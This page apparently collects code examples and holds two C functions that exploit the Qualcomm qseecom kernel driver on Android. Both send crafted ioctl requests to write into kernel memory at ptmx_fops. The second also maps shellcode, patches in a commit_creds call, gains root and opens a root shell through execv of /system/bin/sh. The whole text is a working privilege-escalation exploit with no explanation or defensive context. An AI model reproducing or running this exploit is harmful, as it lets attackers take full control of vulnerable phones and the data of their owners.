Exemplo n.º 1
0
int get_ion(unsigned long address, int value) {
    printf("mypid %d\n",getpid());
    int ret  = -1;
    int  fd = open(QSEECOM_DEVICE, 0);
    if (fd<0) {
        perror("open error qseecom");
        exit(-1);
    }

    void* abuseBuff = malloc(400);
    memset(abuseBuff,0,400);

    int* intArr = (int*)abuseBuff;
    int j = 0;

    for(j=0; j<24; j++) {
        intArr[j] = 0x1;
    }

    struct qseecom_send_modfd_cmd_req ioctlBuff;

    prctl(PR_SET_NAME, "GodFather", 0, 0, 0);


    g_pid = getpid();
    g_tgid = g_pid;
    prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);

    struct qseecom_set_sb_mem_param_req req;
    req.ifd_data_fd = obtain_dma_buf_fd(8192);

    req.virt_sb_base = abuseBuff;
    req.sb_len = 8192;

    ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
    printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret);

    ioctlBuff.cmd_req_buf = abuseBuff;
    ioctlBuff.cmd_req_len = 400;
    ioctlBuff.resp_buf = abuseBuff;
    ioctlBuff.resp_len = 400;
    int i = 0;
    for (i = 0; i<4; i++) {
        ioctlBuff.ifd_data[i].fd = 0;
        ioctlBuff.ifd_data[i].cmd_buf_offset =0;
    }
    ioctlBuff.ifd_data[0].fd = req.ifd_data_fd;
    ioctlBuff.ifd_data[0].cmd_buf_offset =   0;

    //c1334e00 b ptmx_fops
    ioctlBuff.ifd_data[0].cmd_buf_offset =   (unsigned long)(address + 14*4) - (int)abuseBuff;

    ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);

    run_tmp_obtain_root_privilege();
    return true;
}
Exemplo n.º 2
0
int main(int argc, char *argv[]){

        printf("mypid %d\n",getpid());
        int ret  = -1;

                        int  fd = open("/dev/qseecom", 0);
                        if (fd<0){
                        	perror("open");
                        	exit(-1);
                        }

                        void* abuseBuff = malloc(400);
                        memset(abuseBuff,0,400);

                        int* intArr = (int*)abuseBuff;
                        int j = 0;

                        for(j=0;j<24;j++){

                                        intArr[j] = 0x1;

                        }


                        struct qseecom_send_modfd_cmd_req ioctlBuff;

                        prctl(PR_SET_NAME, "GodFather", 0, 0, 0);

                       // if(0==fork()){

                            g_pid = getpid();
                            g_tgid = g_pid;
                            prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);

                            //QSEECOM_IOCTL_SET_MEM_PARAM_REQ
                            struct qseecom_set_sb_mem_param_req req;
                            req.ifd_data_fd = obtain_dma_buf_fd(8192);

                            req.virt_sb_base = abuseBuff;
                            req.sb_len = 8192;

                            ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
                            printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret);

                            ioctlBuff.cmd_req_buf = abuseBuff;
                            ioctlBuff.cmd_req_len = 400;
                            ioctlBuff.resp_buf = abuseBuff;
                            ioctlBuff.resp_len = 400;
                            int i = 0;
                            for (i = 0;i<4;i++){
                            	ioctlBuff.ifd_data[i].fd = 0;
                            	ioctlBuff.ifd_data[i].cmd_buf_offset =0;
                            }
                            ioctlBuff.ifd_data[0].fd = req.ifd_data_fd;
                            ioctlBuff.ifd_data[0].cmd_buf_offset =   0;//(int)(0xc03f0ab4 + 8) - (int)abuseBuff;


                                printf("QSEECOM_IOCTL_SEND_CMD_REQ");
                                ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);


                                printf("return %p %p\n",intArr[0],intArr[1]);
                                perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
                                printf("ioctl return 0x%x \n",ret);

                                //*(int*)intArr[0] = 0x0;
                                void* addr = mmap(intArr[0],4096,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,-1,0);
                                printf("mmap return %p \n",addr);

                                *(int*)addr =  0xE3500000;
                                *((int*)((int)addr+4)) = 0xe1a0f00e;
                                memcpy(addr,shell_code2,400);

                                int* arr = (int*)addr;
                                for(i=0;i<10;i++){
                                	if(arr[i] == 0xeeeeeeee)
                                		arr[i] = (int)MyCommitCred;
                                	printf("%p\n",arr[i]);

                                }

                                //c1334e00 b ptmx_fops
                                ioctlBuff.ifd_data[0].cmd_buf_offset =   (int)(PTMX_FOPS + 14*4) - (int)abuseBuff;


                                printf("QSEECOM_IOCTL_SEND_CMD_REQ");
                                ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
                                printf("return %p %p\n",intArr[0],intArr[1]);
                                perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
                                printf("ioctl return 0x%x \n",ret);


                                run_obtain_root_privilege();


                                char * argv1[]={"sh",(char *)0};
                               int result =  execv("/system/bin/sh", argv1);
                                if(result){
                                                perror("execv");
                                }

        return 0;


}